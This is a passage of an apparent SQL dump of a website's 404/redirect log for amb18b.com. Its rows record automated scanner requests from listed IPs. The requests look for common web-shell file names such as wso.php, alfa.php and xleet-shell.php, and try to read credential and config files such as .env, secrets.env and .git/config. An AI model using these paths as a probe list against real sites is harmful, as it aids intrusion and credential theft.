00:13:13'),(377,'https://amb18b.com/chosen.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:14','2025-10-23 00:13:14'),(378,'https://amb18b.com/classwithtostring.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:16','2025-10-23 00:13:16'),(379,'https://amb18b.com/goods.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:17','2025-10-23 00:13:17'),(380,'https://amb18b.com/wp-admin/css/colors/blue/index.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:19','2025-10-23 00:13:19'),(381,'https://amb18b.com/wp.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:23','2025-10-23 00:13:23'),(382,'https://amb18b.com/wsa.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:24','2025-10-23 00:13:24'),(383,'https://amb18b.com/autoload_classmap.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:26','2025-10-23 00:13:26'),(384,'https://amb18b.com/file.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:29','2025-10-23 00:13:29'),(385,'https://amb18b.com/about.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:30','2025-10-23 00:13:30'),(386,'https://amb18b.com/function.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:32','2025-10-23 00:13:32'),(387,'https://amb18b.com/moon.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:33','2025-10-23 00:13:33'),(388,'https://amb18b.com/ab.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:34','2025-10-23 00:13:34'),(389,'https://amb18b.com/bala.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:36','2025-10-23 00:13:36'),(390,'https://amb18b.com/install.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:37','2025-10-23 00:13:37'),(391,'https://amb18b.com/ova.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:39','2025-10-23 00:13:39'),(392,'https://amb18b.com/admin.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:40','2025-10-23 00:13:40'),(393,'https://amb18b.com/aa.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:42','2025-10-23 00:13:42'),(394,'https://amb18b.com/alfa.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:43','2025-10-23 00:13:43'),(395,'https://amb18b.com/ioxi-o.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:45','2025-10-23 00:13:45'),(396,'https://amb18b.com/lock360.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:46','2025-10-23 00:13:46'),(397,'https://amb18b.com/akc.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:48','2025-10-23 00:13:48'),(398,'https://amb18b.com/asasx.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:49','2025-10-23 00:13:49'),(399,'https://amb18b.com/atomlib.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:51','2025-10-23 00:13:51'),(400,'https://amb18b.com/autoload_classmap/function.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:52','2025-10-23 00:13:52'),(401,'https://amb18b.com/buy.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:54','2025-10-23 00:13:54'),(402,'https://amb18b.com/cong.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:55','2025-10-23 00:13:55'),(403,'https://amb18b.com/edit.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:56','2025-10-23 00:13:56'),(404,'https://amb18b.com/file2.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:58','2025-10-23 00:13:58'),(405,'https://amb18b.com/flower.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:59','2025-10-23 00:13:59'),(406,'https://amb18b.com/gecko.php','40.69.165.140','Direct Access',1,'2025-10-23 00:14:01','2025-10-23 00:14:01'),(407,'https://amb18b.com/goat.php','40.69.165.140','Direct Access',1,'2025-10-23 00:14:02','2025-10-23 00:14:02'),(408,'https://amb18b.com/makeasmtp.php','40.69.165.140','Direct Access',1,'2025-10-23 00:14:04','2025-10-23 00:14:04'),(409,'https://amb18b.com/mm.php','40.69.165.140','Direct Access',1,'2025-10-23 00:14:05','2025-10-23 00:14:05'),(410,'https://amb18b.com/tinyfilemanager.php','40.69.165.140','Direct Access',1,'2025-10-23 00:14:06','2025-10-23 00:14:06'),(411,'https://amb18b.com/users.php','40.69.165.140','Direct Access',1,'2025-10-23 00:14:08','2025-10-23 00:14:08'),(412,'https://amb18b.com/w.php','40.69.165.140','Direct Access',1,'2025-10-23 00:14:09','2025-10-23 00:14:09'),(413,'https://amb18b.com/wordpress','13.90.208.94','Direct Access',1,'2025-10-23 00:31:57','2025-10-23 00:31:57'),(414,'https://amb18b.com/wp','13.90.208.94','Direct Access',1,'2025-10-23 00:32:00','2025-10-23 00:32:00'),(415,'https://amb18b.com/bc','13.90.208.94','Direct Access',1,'2025-10-23 00:32:02','2025-10-23 00:32:02'),(416,'https://amb18b.com/bk','13.90.208.94','Direct Access',1,'2025-10-23 00:32:03','2025-10-23 00:32:03'),(417,'https://amb18b.com/backup','13.90.208.94','Direct Access',1,'2025-10-23 00:32:05','2025-10-23 00:32:05'),(418,'https://amb18b.com/old','13.90.208.94','Direct Access',1,'2025-10-23 00:32:06','2025-10-23 00:32:06'),(419,'https://amb18b.com/new','13.90.208.94','Direct Access',1,'2025-10-23 00:32:07','2025-10-23 00:32:07'),(420,'https://amb18b.com/main','13.90.208.94','Direct Access',1,'2025-10-23 00:32:08','2025-10-23 00:32:08'),(421,'https://amb18b.com/wp-cli.phar','195.19.124.165','Direct Access',1,'2025-10-23 00:38:26','2025-10-23 00:38:26'),(422,'https://amb18b.com/wp-cli.php','195.19.124.165','Direct Access',1,'2025-10-23 00:38:26','2025-10-23 00:38:26'),(423,'https://amb18b.com/app/','34.1.18.14','Direct Access',4,'2025-10-23 00:45:55','2025-10-23 00:45:37'),(424,'https://amb18b.com/login/','34.1.18.14','Direct Access',4,'2025-10-23 00:45:57','2025-10-23 00:45:39'),(425,'https://amb18b.com/k90.php','4.217.189.130','Direct Access',1,'2025-10-23 04:09:45','2025-10-23 04:09:45'),(426,'https://amb18b.com/uwu2.php','4.217.189.130','Direct Access',1,'2025-10-23 04:09:47','2025-10-23 04:09:47'),(427,'https://amb18b.com/nc4.php','4.217.189.130','Direct Access',1,'2025-10-23 04:09:48','2025-10-23 04:09:48'),(428,'https://amb18b.com/ahax.php','4.217.189.130','Direct Access',1,'2025-10-23 04:09:51','2025-10-23 04:09:51'),(429,'https://amb18b.com/akcc.php','4.217.189.130','Direct Access',1,'2025-10-23 04:09:53','2025-10-23 04:09:53'),(430,'https://amb18b.com/wp.php','4.217.189.130','Direct Access',2,'2025-10-23 04:13:09','2025-10-23 04:09:55'),(431,'https://amb18b.com/zews.php','4.217.189.130','Direct Access',1,'2025-10-23 04:09:58','2025-10-23 04:09:58'),(432,'https://amb18b.com/zwso.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:01','2025-10-23 04:10:01'),(433,'https://amb18b.com/124.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:05','2025-10-23 04:10:05'),(434,'https://amb18b.com/epinyins.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:08','2025-10-23 04:10:08'),(435,'https://amb18b.com/geck.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:10','2025-10-23 04:10:10'),(436,'https://amb18b.com/fm.php?p=','4.217.189.130','Direct Access',1,'2025-10-23 04:10:13','2025-10-23 04:10:13'),(437,'https://amb18b.com/shout.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:17','2025-10-23 04:10:17'),(438,'https://amb18b.com/size.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:20','2025-10-23 04:10:20'),(439,'https://amb18b.com/wp-gr.php','4.217.189.130','Direct Access',2,'2025-10-23 04:13:05','2025-10-23 04:10:22'),(440,'https://amb18b.com/wp-mn.php','4.217.189.130','Direct Access',2,'2025-10-23 04:13:11','2025-10-23 04:10:24'),(441,'https://amb18b.com/wp-mt.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:26','2025-10-23 04:10:26'),(442,'https://amb18b.com/ww.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:28','2025-10-23 04:10:28'),(443,'https://amb18b.com/111.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:29','2025-10-23 04:10:29'),(444,'https://amb18b.com/ova.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:31','2025-10-23 04:10:31'),(445,'https://amb18b.com/abcd.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:33','2025-10-23 04:10:33'),(446,'https://amb18b.com/chosen.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:35','2025-10-23 04:10:35'),(447,'https://amb18b.com/123.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:38','2025-10-23 04:10:38'),(448,'https://amb18b.com/we.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:46','2025-10-23 04:10:46'),(449,'https://amb18b.com/goat.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:48','2025-10-23 04:10:48'),(450,'https://amb18b.com/ioxi-o.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:51','2025-10-23 04:10:51'),(451,'https://amb18b.com/v.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:53','2025-10-23 04:10:53'),(452,'https://amb18b.com/ar.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:55','2025-10-23 04:10:55'),(453,'https://amb18b.com/qing.php','4.217.189.130','Direct Access',1,'2025-10-23 04:10:58','2025-10-23 04:10:58'),(454,'https://amb18b.com/lv.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:00','2025-10-23 04:11:01'),(455,'https://amb18b.com/mms.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:02','2025-10-23 04:11:02'),(456,'https://amb18b.com/gmo.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:04','2025-10-23 04:11:04'),(457,'https://amb18b.com/dev.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:06','2025-10-23 04:11:06'),(458,'https://amb18b.com/lite.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:08','2025-10-23 04:11:08'),(459,'https://amb18b.com/error.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:12','2025-10-23 04:11:12'),(460,'https://amb18b.com/pp.php','4.217.189.130','Direct Access',2,'2025-10-23 04:13:13','2025-10-23 04:11:14'),(461,'https://amb18b.com/a1.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:16','2025-10-23 04:11:16'),(462,'https://amb18b.com/a2.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:19','2025-10-23 04:11:19'),(463,'https://amb18b.com/bless.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:23','2025-10-23 04:11:23'),(464,'https://amb18b.com/lock360.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:28','2025-10-23 04:11:28'),(465,'https://amb18b.com/alfa.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:32','2025-10-23 04:11:32'),(466,'https://amb18b.com/ee.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:36','2025-10-23 04:11:36'),(467,'https://amb18b.com/6.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:39','2025-10-23 04:11:39'),(468,'https://amb18b.com/12.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:43','2025-10-23 04:11:43'),(469,'https://amb18b.com/02.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:46','2025-10-23 04:11:46'),(470,'https://amb18b.com/2.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:50','2025-10-23 04:11:50'),(471,'https://amb18b.com/13.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:55','2025-10-23 04:11:55'),(472,'https://amb18b.com/13k.php','4.217.189.130','Direct Access',1,'2025-10-23 04:11:58','2025-10-23 04:11:58'),(473,'https://amb18b.com/css.php','4.217.189.130','Direct Access',2,'2025-10-23 04:13:14','2025-10-23 04:12:00'),(474,'https://amb18b.com/bypass.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:02','2025-10-23 04:12:02'),(475,'https://amb18b.com/3.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:05','2025-10-23 04:12:05'),(476,'https://amb18b.com/10.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:08','2025-10-23 04:12:08'),(477,'https://amb18b.com/kk.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:12','2025-10-23 04:12:12'),(478,'https://amb18b.com/cf.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:15','2025-10-23 04:12:15'),(479,'https://amb18b.com/456.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:18','2025-10-23 04:12:18'),(480,'https://amb18b.com/7.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:23','2025-10-23 04:12:23'),(481,'https://amb18b.com/dropdown.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:27','2025-10-23 04:12:27'),(482,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:30','2025-10-23 04:12:30'),(483,'https://amb18b.com/2x.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:32','2025-10-23 04:12:32'),(484,'https://amb18b.com/aa.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:36','2025-10-23 04:12:36'),(485,'https://amb18b.com/goods.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:39','2025-10-23 04:12:39'),(486,'https://amb18b.com/pepe.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:41','2025-10-23 04:12:41'),(487,'https://amb18b.com/file32.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:43','2025-10-23 04:12:43'),(488,'https://amb18b.com/file.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:45','2025-10-23 04:12:45'),(489,'https://amb18b.com/x.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:47','2025-10-23 04:12:47'),(490,'https://amb18b.com/11.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:52','2025-10-23 04:12:52'),(491,'https://amb18b.com/class20.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:56','2025-10-23 04:12:56'),(492,'https://amb18b.com/ll.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:57','2025-10-23 04:12:57'),(493,'https://amb18b.com/wp-admin/maint/maint.php','4.217.189.130','Direct Access',1,'2025-10-23 04:12:59','2025-10-23 04:12:59'),(494,'https://amb18b.com/atomlib.php','4.217.189.130','Direct Access',1,'2025-10-23 04:13:01','2025-10-23 04:13:01'),(495,'https://amb18b.com/system_log.php','4.217.189.130','Direct Access',1,'2025-10-23 04:13:03','2025-10-23 04:13:03'),(496,'https://amb18b.com/asus.php','4.217.189.130','Direct Access',1,'2025-10-23 04:13:08','2025-10-23 04:13:08'),(497,'https://amb18b.com/xx.php','4.217.189.130','Direct Access',1,'2025-10-23 04:13:10','2025-10-23 04:13:10'),(498,'https://amb18b.com/jp.php','4.217.189.130','Direct Access',1,'2025-10-23 04:13:15','2025-10-23 04:13:15'),(499,'https://amb18b.com/html.php','4.217.189.130','Direct Access',1,'2025-10-23 04:13:17','2025-10-23 04:13:17'),(500,'https://amb18b.com/system_log.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:25','2025-10-23 05:10:25'),(501,'https://amb18b.com/chosen.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:26','2025-10-23 05:10:26'),(502,'https://amb18b.com/bless.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:27','2025-10-23 05:10:27'),(503,'https://amb18b.com/wp-gr.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:28','2025-10-23 05:10:28'),(504,'https://amb18b.com/chosen.php?p','172.192.17.78','Direct Access',1,'2025-10-23 05:10:29','2025-10-23 05:10:29'),(505,'https://amb18b.com/file.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:31','2025-10-23 05:10:31'),(506,'https://amb18b.com/dev.php?p','172.192.17.78','Direct Access',1,'2025-10-23 05:10:32','2025-10-23 05:10:32'),(507,'https://amb18b.com/moon.php?p','172.192.17.78','Direct Access',1,'2025-10-23 05:10:33','2025-10-23 05:10:33'),(508,'https://amb18b.com/ahax.php?p','172.192.17.78','Direct Access',1,'2025-10-23 05:10:34','2025-10-23 05:10:34'),(509,'https://amb18b.com/abcd.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:35','2025-10-23 05:10:35'),(510,'https://amb18b.com/wp.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:36','2025-10-23 05:10:36'),(511,'https://amb18b.com/we.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:38','2025-10-23 05:10:38'),(512,'https://amb18b.com/a1.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:39','2025-10-23 05:10:39'),(513,'https://amb18b.com/class20.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:40','2025-10-23 05:10:40'),(514,'https://amb18b.com/wp-blog.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:41','2025-10-23 05:10:41'),(515,'https://amb18b.com/atomlib.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:42','2025-10-23 05:10:42'),(516,'https://amb18b.com/fm.php?p','172.192.17.78','Direct Access',1,'2025-10-23 05:10:43','2025-10-23 05:10:43'),(517,'https://amb18b.com/filemanager.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:45','2025-10-23 05:10:45'),(518,'https://amb18b.com/epinyins.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:46','2025-10-23 05:10:46'),(519,'https://amb18b.com/aa.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:47','2025-10-23 05:10:47'),(520,'https://amb18b.com/ahax.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:48','2025-10-23 05:10:48'),(521,'https://amb18b.com/asus.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:49','2025-10-23 05:10:49'),(522,'https://amb18b.com/a2.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:50','2025-10-23 05:10:50'),(523,'https://amb18b.com/alfa.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:51','2025-10-23 05:10:51'),(524,'https://amb18b.com/goods.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:53','2025-10-23 05:10:53'),(525,'https://amb18b.com/lock360.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:54','2025-10-23 05:10:54'),(526,'https://amb18b.com/admin.php?p','172.192.17.78','Direct Access',1,'2025-10-23 05:10:55','2025-10-23 05:10:55'),(527,'https://amb18b.com/av.php','172.192.17.78','Direct Access',1,'2025-10-23 05:10:56','2025-10-23 05:10:56'),(528,'https://amb18b.com/wp-afmin','45.8.17.175','Direct Access',1,'2025-10-23 07:16:32','2025-10-23 07:16:32'),(529,'https://amb18b.com/wp-admin/css/','62.171.130.174','Invalid Referrer',1,'2025-10-23 07:36:47','2025-10-23 07:36:47'),(530,'https://amb18b.com/@vite/env','96.41.38.202','Direct Access',1,'2025-10-23 07:46:04','2025-10-23 07:46:04'),(531,'https://amb18b.com/actutor/env','96.41.38.202','Direct Access',1,'2025-10-23 07:46:06','2025-10-23 07:46:06'),(532,'https://amb18b.com/.vscode/sftp.json','96.41.38.202','Direct Access',1,'2025-10-23 07:46:07','2025-10-23 07:46:07'),(533,'https://amb18b.com/.env','96.41.38.202','Direct Access',1,'2025-10-23 07:46:10','2025-10-23 07:46:10'),(534,'https://amb18b.com/.git/config','96.41.38.202','Direct Access',1,'2025-10-23 07:46:12','2025-10-23 07:46:12'),(535,'https://amb18b.com/%e0%b9%82%e0%b8%9b%e0%b8%a3%e0%b9%82%e0%b8%a1%e0%b8%8a%e0%b8%b1%e0%b9%88%e0%b8%99/','182.232.98.50','https://amb18b.com/',1,'2025-10-23 07:55:44','2025-10-23 07:55:44'),(536,'https://amb18b.com/admin.php','109.252.4.133','Direct Access',1,'2025-10-23 08:08:07','2025-10-23 08:08:07'),(537,'https://amb18b.com/xleet.php','109.252.4.133','Direct Access',1,'2025-10-23 08:08:07','2025-10-23 08:08:07'),(538,'https://amb18b.com/xleet-shell.php','109.252.4.133','Direct Access',1,'2025-10-23 08:08:07','2025-10-23 08:08:07'),(539,'https://amb18b.com/wso.php','109.252.4.133','Direct Access',1,'2025-10-23 08:08:08','2025-10-23 08:08:08'),(540,'https://amb18b.com/shell.php','109.252.4.133','Direct Access',1,'2025-10-23 08:08:08','2025-10-23 08:08:08'),(541,'https://amb18b.com/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:35','2025-10-23 10:10:35'),(542,'https://amb18b.com/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:36','2025-10-23 10:10:36'),(543,'https://amb18b.com/sendgrid.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:37','2025-10-23 10:10:37'),(544,'https://amb18b.com/twilio.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:39','2025-10-23 10:10:39'),(545,'https://amb18b.com/api/.env','204.76.203.31','Direct Access',2,'2025-10-23 10:10:57','2025-10-23 10:10:40'),(546,'https://amb18b.com/phpinfo/','204.76.203.31','Direct Access',1,'2025-10-23 10:10:40','2025-10-23 10:10:40'),(547,'https://amb18b.com/dev/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:41','2025-10-23 10:10:41'),(548,'https://amb18b.com/sendgrid.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:41','2025-10-23 10:10:41'),(549,'https://amb18b.com/app_dev.php/_profiler/phpinfo','204.76.203.31','Direct Access',1,'2025-10-23 10:10:42','2025-10-23 10:10:42'),(550,'https://amb18b.com/twilio.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:42','2025-10-23 10:10:42'),(551,'https://amb18b.com/admin/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:43','2025-10-23 10:10:43'),(552,'https://amb18b.com/api/.env','204.76.203.31','Direct Access',2,'2025-10-23 10:11:04','2025-10-23 10:10:44'),(553,'https://amb18b.com/laravel/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:44','2025-10-23 10:10:44'),(554,'https://amb18b.com/phpinfo/','204.76.203.31','Direct Access',1,'2025-10-23 10:10:45','2025-10-23 10:10:45'),(555,'https://amb18b.com/.config.yaml','204.76.203.31','Direct Access',1,'2025-10-23 10:10:45','2025-10-23 10:10:45'),(556,'https://amb18b.com/dev/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:46','2025-10-23 10:10:46'),(557,'https://amb18b.com/backend/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:46','2025-10-23 10:10:46'),(558,'https://amb18b.com/app_dev.php/_profiler/phpinfo','204.76.203.31','Direct Access',1,'2025-10-23 10:10:47','2025-10-23 10:10:47'),(559,'https://amb18b.com/secrets.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:47','2025-10-23 10:10:47'),(560,'https://amb18b.com/admin/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:48','2025-10-23 10:10:48'),(561,'https://amb18b.com/.env.example','204.76.203.31','Direct Access',1,'2025-10-23 10:10:48','2025-10-23 10:10:48'),(562,'https://amb18b.com/laravel/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:49','2025-10-23 10:10:49'),(563,'https://amb18b.com/web/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:49','2025-10-23 10:10:49'),(564,'https://amb18b.com/.env.bak','204.76.203.31','Direct Access',1,'2025-10-23 10:10:50','2025-10-23 10:10:50'),(565,'https://amb18b.com/.config.yaml','204.76.203.31','Direct Access',1,'2025-10-23 10:10:50','2025-10-23 10:10:50'),(566,'https://amb18b.com/staging/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:50','2025-10-23 10:10:50'),(567,'https://amb18b.com/debug/default/view?panel=config','204.76.203.31','Direct Access',1,'2025-10-23 10:10:51','2025-10-23 10:10:51'),(568,'https://amb18b.com/backend/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:51','2025-10-23 10:10:51'),(569,'https://amb18b.com/secrets.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:52','2025-10-23 10:10:52'),(570,'https://amb18b.com/core/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:52','2025-10-23 10:10:52'),(571,'https://amb18b.com/phpinfo.php','204.76.203.31','Direct Access',1,'2025-10-23 10:10:53','2025-10-23 10:10:53'),(572,'https://amb18b.com/.env.example','204.76.203.31','Direct Access',1,'2025-10-23 10:10:53','2025-10-23 10:10:53'),(573,'https://amb18b.com/info/','204.76.203.31','Direct Access',1,'2025-10-23 10:10:54','2025-10-23 10:10:54'),(574,'https://amb18b.com/web/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:54','2025-10-23 10:10:54'),(575,'https://amb18b.com/images/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:54','2025-10-23 10:10:54'),(576,'https://amb18b.com/.env.save.1','204.76.203.31','Direct Access',1,'2025-10-23 10:10:55','2025-10-23 10:10:55'),(577,'https://amb18b.com/.env.bak','204.76.203.31','Direct Access',1,'2025-10-23 10:10:55','2025-10-23 10:10:55'),(578,'https://amb18b.com/.env.save','204.76.203.31','Direct Access',1,'2025-10-23 10:10:56','2025-10-23 10:10:56'),(579,'https://amb18b.com/staging/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:56','2025-10-23 10:10:56'),(580,'https://amb18b.com/debug/default/view?panel=config','204.76.203.31','Direct Access',1,'2025-10-23 10:10:57','2025-10-23 10:10:57'),(581,'https://amb18b.com/app/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:58','2025-10-23 10:10:58'),(582,'https://amb18b.com/core/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:10:58','2025-10-23 10:10:58'),(583,'https://amb18b.com/test','204.76.203.31','Direct Access',1,'2025-10-23 10:10:58','2025-10-23 10:10:59'),(584,'https://amb18b.com/phpinfo.php','204.76.203.31','Direct Access',1,'2025-10-23 10:10:59','2025-10-23 10:10:59'),(585,'https://amb18b.com/info/','204.76.203.31','Direct Access',1,'2025-10-23 10:11:00','2025-10-23 10:11:00'),(586,'https://amb18b.com/images/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:11:01','2025-10-23 10:11:01'),(587,'https://amb18b.com/.env.save.1','204.76.203.31','Direct Access',1,'2025-10-23 10:11:01','2025-10-23 10:11:01'),(588,'https://amb18b.com/.env.save','204.76.203.31','Direct Access',1,'2025-10-23 10:11:02','2025-10-23 10:11:02'),(589,'https://amb18b.com/app/.env','204.76.203.31','Direct Access',1,'2025-10-23 10:11:05','2025-10-23 10:11:05'),(590,'https://amb18b.com/test','204.76.203.31','Direct Access',1,'2025-10-23 10:11:06','2025-10-23 10:11:06'),(591,'https://amb18b.com/.well-known/acme-challenge/','52.176.88.217','Direct Access',1,'2025-10-23 10:37:48','2025-10-23 10:37:48'),(592,'https://amb18b.com/abcd.php','52.176.88.217','Direct Access',1,'2025-10-23 10:37:50','2025-10-23 10:37:50'),(593,'https://amb18b.com/about.php?p=','52.176.88.217','Direct Access',1,'2025-10-23 10:37:52','2025-10-23 10:37:52'),(594,'https://amb18b.com/chosen.php?p=','52.176.88.217','Direct Access',1,'2025-10-23 10:37:54','2025-10-23 10:37:54'),(595,'https://amb18b.com/default.php','52.176.88.217','Direct Access',1,'2025-10-23 10:37:55','2025-10-23 10:37:55'),(596,'https://amb18b.com/ds.php','52.176.88.217','Direct Access',1,'2025-10-23 10:37:57','2025-10-23 10:37:57'),(597,'https://amb18b.com/f5.php','52.176.88.217','Direct Access',1,'2025-10-23 10:37:59','2025-10-23 10:37:59'),(598,'https://amb18b.com/file.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:01','2025-10-23 10:38:01'),(599,'https://amb18b.com/god4m.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:02','2025-10-23 10:38:02'),(600,'https://amb18b.com/info.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:04','2025-10-23 10:38:04'),(601,'https://amb18b.com/modules/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:06','2025-10-23 10:38:06'),(602,'https://amb18b.com/test1.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:07','2025-10-23 10:38:07'),(603,'https://amb18b.com/uploads/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:09','2025-10-23 10:38:09'),(604,'https://amb18b.com/wp-admin/images/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:11','2025-10-23 10:38:11'),(605,'https://amb18b.com/wp-good.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:15','2025-10-23 10:38:15'),(606,'https://amb18b.com/wp-includes/ID3/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:16','2025-10-23 10:38:16'),(607,'https://amb18b.com/wp-includes/Text/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:18','2025-10-23 10:38:18'),(608,'https://amb18b.com/wp-includes/assets/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:20','2025-10-23 10:38:20'),(609,'https://amb18b.com/wp-includes/js/codemirror/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:21','2025-10-23 10:38:21'),(610,'https://amb18b.com/wp-includes/js/crop/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:23','2025-10-23 10:38:23'),(611,'https://amb18b.com/wp-includes/pomo/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:25','2025-10-23 10:38:25'),(612,'https://amb18b.com/wp-includes/rest-api/fields/','52.176.88.217','Direct Access',1,'2025-10-23 10:38:27','2025-10-23 